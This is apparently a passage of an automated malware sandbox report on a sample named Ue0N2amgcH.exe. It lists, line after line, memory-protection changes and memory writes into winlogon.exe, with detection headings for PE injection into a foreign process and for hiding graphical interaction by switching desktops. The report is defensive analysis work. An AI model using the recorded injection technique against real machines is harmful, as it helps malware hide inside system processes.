Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D314000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D316000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D320000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D321000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D332000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D334000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D336000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D340000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D341000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D352000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D354000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D356000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D360000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D361000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D372000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D374000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D376000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D380000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D381000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D392000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D394000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D396000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3A0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3B2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3B4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3C0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3D2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3D4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3E0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3F2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3F4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D3F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D400000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D401000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D412000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D414000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D416000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D420000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D421000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D432000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D434000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D436000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D440000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D441000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D452000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D454000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D472000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D474000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D492000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D494000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D512000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D514000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D532000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D534000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D552000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D554000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D572000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D574000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D592000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D594000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Code function: 0_2_00409EE6 OpenWindowStationA,SetProcessWindowStation,OpenDesktopA,SetThreadDesktop,CloseDesktop,CloseWindowStation
Injects a PE file into a foreign process
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD2000Jump to behavior
